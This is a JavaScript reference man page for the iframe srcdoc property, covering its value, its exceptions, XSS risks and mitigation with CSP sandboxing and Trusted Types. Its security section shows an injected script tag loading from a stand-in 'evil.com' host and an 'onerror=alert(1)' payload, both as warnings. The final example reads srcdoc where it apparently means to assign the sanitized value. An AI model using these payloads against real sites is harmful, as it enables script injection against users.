.\" Automatically generated by Pandoc 3.8
.\"
.TH "HTMLIFRAMEELEMENT.SRCDOC" "3JS" "November 21, 2025" "JavaScript" "JavaScript Reference Manual"
.SH NAME
HTMLIFrameElement.srcdoc \- HTMLIFrameElement: srcdoc property
.SH SYNOPSIS
.RS
.PP
\f[B]Warning:\f[R] This property parses its input as HTML, writing the
result into the frame\(cqs DOM.
APIs like this are known as injection sinks, and are potentially a
vector for cross\-site scripting (XSS) attacks, if the input originally
came from an attacker.
.PP
You can mitigate this risk by always assigning \f[CR]TrustedHTML\f[R]
objects instead of strings and enforcing trusted types.
See Security considerations for more information.
.RE
.PP
The \f[B]\f[CB]srcdoc\f[B]\f[R] property of the
\f[CR]HTMLIFrameElement\f[R] interface gets or sets the inline HTML
markup of the frame\(cqs document.
.PP
This reflects the \f[CR]srcdoc\f[R] attribute of the
\f[CR]<iframe>\f[R].
.SH VALUE
Getting the property returns a string containing the HTML serialization
of the frame\(cqs document.
This is \f[CR]undefined\f[R] if the value is not set.
.PP
Setting the property accepts either a \f[CR]TrustedHTML\f[R] object or a
string.
It parses this input as a HTML document and replaces the content of the
frame with the result.
.SS Exceptions
.TP
\f[B]TypeError\f[R]
Thrown if the property is set to a string when Trusted Types are
enforced by a CSP and no default policy is defined.
.SH DESCRIPTION
The \f[B]\f[CB]srcdoc\f[B]\f[R] property reflects the content of the
\f[CR]<iframe>\f[R] element\(cqs \f[CR]srcdoc\f[R] attribute, and can be
used to set or get the HTML document belonging to the
\f[CR]<iframe>\f[R].
.PP
When setting the property the input should define a valid HTML document,
including the doctype directive, \f[CR]<html>\f[R], \f[CR]<body>\f[R],
and other tags.
Note though, that browsers are usually tolerant of invalid markup, and
most should attempt to render input that contains only body content.
.PP
Any markup supported by the browser will be parsed/serialized, including
Shadow roots.
.PP
Note that if this is set, it will override any value set in the
\f[CR]src\f[R] property.
.SS Security considerations
The \f[CR]srcdoc\f[R] property allows absolutely any HTML markup to run
in a frame by default.
If the frame is not sandboxed using the Content Security Property (CSP)
\f[CR]sandbox\f[R] directive (or is sandboxed but includes the
\f[CR]allow\-same\-origin\f[R] value) then it will be same\-origin with
the parent.
This means that the frame will have complete access to the parent DOM
and resources, and visa versa.
.PP
This is a significant vector for cross\-site scripting (XSS) attacks if
potentially unsafe strings provided by a user are injected into a frame
without first being sanitized.
Consider the following code where a string of HTML from a user might be
passed into a frame that is then added to the document.
.IP
.EX
\f[B]const\f[R] untrustedStringFromUser = \(ga<!doctype html><script src=\(dqhttp://evil.com/naughty.js\(dq></script>\(ga;
\f[B]const\f[R] iframe = document.createElement(\(dqiframe\(dq);
iframe.srcdoc = untrustedStringFromUser;
document.body.appendChild(iframe);
.EE
.PP
If the frame is not expected to need access to your parent document, you
can mitigate the risk by using a CSP sandbox without the
\f[CR]allow\-same\-origin\f[R] value.
The frame will then be treated as a cross\-origin resource, and attacks
will be significantly restricted.
You can also use a more general CSP to restrict the locations from which
scripts and other resources are allowed to be fetched.
.PP
You can further reduce the risk by always assigning
\f[CR]TrustedHTML\f[R] objects instead of strings, and enforcing trusted
type using the \f[CR]require\-trusted\-types\-for\f[R] CSP directive.
This ensures that the input is passed through a transformation function,
which has the chance to sanitize the input to remove potentially
dangerous markup before it is injected.
.SH EXAMPLES
.SS Reading the HTML from an iframe
Reading \f[CR]srcdoc\f[R] causes the user agent to serialize the
iframe\(cqs document.
.PP
Given the following HTML:
.IP
.EX
<\f[B]iframe\f[R]
  id=\(dqexample\(dq
  srcdoc=\(dq\f[B]<\f[R]!doctype html>\f[B]<\f[R]body>\f[B]<\f[R]p>Hello World!\f[B]<\f[R]/p>\f[B]<\f[R]/body>\(dq></\f[B]iframe\f[R]>
.EE
.PP
You can get and log the markup as shown:
.IP
.EX
\f[B]const\f[R] frame = document.querySelector(\(dq#example\(dq);
\f[B]const\f[R] frameDoc = frame.srcdoc;
console.log(frameDoc); \f[I]// \(dq<!doctype html><body><p>Hello World!</p></body>\(dq\f[R]
.EE
.SS Replacing the frame inline source
In this example we\(cqll replace a frame\(cqs document by assigning HTML
to its \f[CR]srcdoc\f[R] property.
To mitigate the risk of XSS, we\(cqll first create a
\f[CR]TrustedHTML\f[R] object from the string containing the HTML, and
then assign that object to \f[CR]srcdoc\f[R].
.PP
Trusted types are not yet supported on all browsers, so first we define
the trusted types tinyfill.
This acts as a transparent replacement for the Trusted Types JavaScript
API:
.IP
.EX
\f[B]if\f[R] (\f[B]typeof\f[R] trustedTypes === \(dqundefined\(dq)
  trustedTypes = { createPolicy: (n, rules) \f[B]=>\f[R] rules };
.EE
.PP
Next we create a \f[CR]TrustedTypePolicy\f[R] that defines a
\f[CR]createHTML()\f[R] for transforming an input string into
\f[CR]TrustedHTML\f[R] instances.
Commonly, implementations of \f[CR]createHTML()\f[R] use a library such
as \c
.UR https://github.com/cure53/DOMPurify
DOMPurify
.UE \c
\ to sanitize the input, as shown below:
.IP
.EX
\f[B]const\f[R] policy = trustedTypes.createPolicy(\(dqmy\-policy\(dq, {
  createHTML: (input) \f[B]=>\f[R] DOMPurify.sanitize(input),
});
.EE
.PP
Then we use this \f[CR]policy\f[R] object to create a
\f[CR]TrustedHTML\f[R] object from the potentially unsafe input string,
and assign the result to the element:
.IP
.EX
\f[I]// The potentially malicious string\f[R]
\f[B]const\f[R] untrustedString =
  \(dq<!doctype html><body><p>I might be XSS</p><img src=\(aqx\(aq onerror=\(aqalert(1)\(aq></body>\(dq;

\f[I]// Create a TrustedHTML instance using the policy\f[R]
\f[B]const\f[R] trustedHTML = policy.createHTML(untrustedString);

\f[I]// Inject the TrustedHTML (which contains a trusted string)\f[R]
\f[B]const\f[R] frame = document.querySelector(\(dq#example\(dq);
\f[B]const\f[R] frameDoc = frame.srcdoc;
.EE
.RS
.PP
\f[B]Warning:\f[R] While you can directly assign a string to
\f[CR]srcdoc\f[R], this is a security risk if the string to be inserted
might contain potentially malicious content.
You should use \f[CR]TrustedHTML\f[R] to ensure that the content is
sanitized before it is inserted, and you should set a CSP header to
enforce trusted types.
.RE
